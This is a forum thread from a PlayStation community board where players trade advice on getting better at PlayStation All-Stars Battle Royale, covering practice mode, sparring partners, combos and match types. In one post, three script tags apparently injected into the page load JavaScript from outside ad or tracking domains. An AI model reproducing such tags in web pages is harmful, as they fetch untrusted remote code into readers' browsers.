Uncharted Territory
1622 posts

Re: Food for Thought... "Improving"

[ Edited ]
Jan 2, 2013

Fighting people who know what their doing does help, I know this is not all but most really good players have that 1-2 combos a character they fall back on of you learn them you get better at avoiding them. I also play against the CPU on the highest difficulty sometimes it can help. The problem is you can't take one thing into all match types I'm pretty good at FFA and 2v2, but as you have seen just average at 1v1 as I do t play it as much you have to play each match type somewhat differently it seems like. Also on a side note I saw you mentioned it be able to get grabbed out of rolls needs to go it defeats the whole point of the supposed invulnerability your supposed to have during the roll imo.

Message 11 of 25 (128 Views)
0 Likes
Highlighted
Hekseville Citizen
370 posts

Jan 2, 2013
Sometimes the big difference in a game and the winner is the one whi was most aware. I play AI when im racking up deaths i couldve avoided. Then i always have a radek in the group because if i don't pay attention to my surroundings then radec's lvl 1 will have a field day.
Message 12 of 25 (113 Views)
0 Likes
Monster Hunter
35 posts

Jan 2, 2013

Here are my steps, but the mantra to remember is you learn more from defeat then victory.

1: Play better people and talk with them about whats good and bad. This requires both parties to understand what the goal is.

2: Watch videos and forums and practice in training mode.

3: Experiment to find timing down

4: Play others  in games, bo10 preferred.

I usually 1v1 with people on my freinds list, mic always preferred to actually talk about the progression. No need to be silent during an improvement match.

Message 13 of 25 (106 Views)
0 Likes
Hekseville Citizen
345 posts

Jan 2, 2013

When I play as a new character, I go into practice.  I first try out every attack and try out every combo possibility I can think of to find whether or not it works.  For characters with certain skills, like Sly and his dynamite, I've switched characters and used a different controller and every character to find what attacks reflect and what attacks don't.

Afterwards I jump into quick match with the character I practiced with.  Spending 30 minutes and sometimes more in practice I've came out and jumped right into quick match, and the majority of the time winning the match by a landslide against other players who played as the exact same character but on a much higher level(it may take a few matches to see another character, but all the same.)    

Practice works far better than just jumping into a computer level five match because you won't gain as much knowledge of the character just jumping into combat. 

Message 14 of 25 (105 Views)
0 Likes
Wastelander
850 posts

Jan 2, 2013
When I try a character I go against four computers on Setting 3 in Free-For-All. I'll learn as time goes on. =)
Message 15 of 25 (92 Views)
0 Likes
Uncharted Territory
1361 posts

Jan 2, 2013

I play Ranked Matches.

Message 16 of 25 (89 Views)
0 Likes
Gaming Beast
2167 posts

Jan 2, 2013
I'm kind of weird about how I go about it, but there are several methods:

A) Practice with good people, preferably people who main different characters.

B) Training mode to learn new combos, options, tech chases, mixups, etc.

C) Quick match 2v2 to practice implementing techniques in a real match

D) This is something I only recently did but really helped. I took someone who plays the same character as me and is also really good with him (Renegade for Good Cole in this case), and we just went into medium training room with 30 stocks and treated it like a 2 player training mode, bouncing ideas off of each other. He showed me some stuff, I've shown him some stuff, and we actually found some new things in those sessions thanks to adapting each other's techniques to new situations.

E) Think about potential scenarios when you're not playing and what you can do in them. This is how I came up with 90% of my tech for Captain America and Super Skrull in Marvel vs Capcom 3, and it helped me develop some combos, mindgames, mix ups and tech chases in this game as well.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 17 of 25 (79 Views)
0 Likes
Uncharted Territory
1660 posts

Jan 2, 2013
I make full use of Practice Mode. I try out new combos, set-ups, mobility, etc. Then I go online to test the practicality of all of them. If they work, great. Now I have new strategies. If they don't, oh well. I have other stuff too. I have an interesting Sir Dan setup that I want to try at the moment, actually
------------------------------------------------
Fresh to death
Message 18 of 25 (75 Views)
0 Likes
Wastelander
768 posts

Jan 3, 2013

RikkiRossTheBoss wrote:
Since this is a very decent thread and no harsh comments to anyone, plus this is something that needs to be spoke about within the community

@asis
Do you use a combo character, I.e Dante, nariko?

I know how to use Nariko and im learning dante as we speak but no I dont like maining people who are comboish... I like the zoning strange characters like toro, Sir Dan, Drake, Evil Cole, Rachet you know the strange but cool characters but i do honestly feel everyone in this game is good some are broken tho

YT: DatTeamAxcel for all my latest PSAS related content. I upload everything FFAs 2v2 1v1, Combo & How to Videos, and Player and character breakdowns.
Message 19 of 25 (59 Views)
0 Likes
Uncharted Territory
1360 posts

Jan 3, 2013

It's always nice to learn new tricks with Sir Dan. I'm looking to step my game up now that I have working controllers.

Image and video hosting by TinyPic
Message 20 of 25 (55 Views)
0 Likes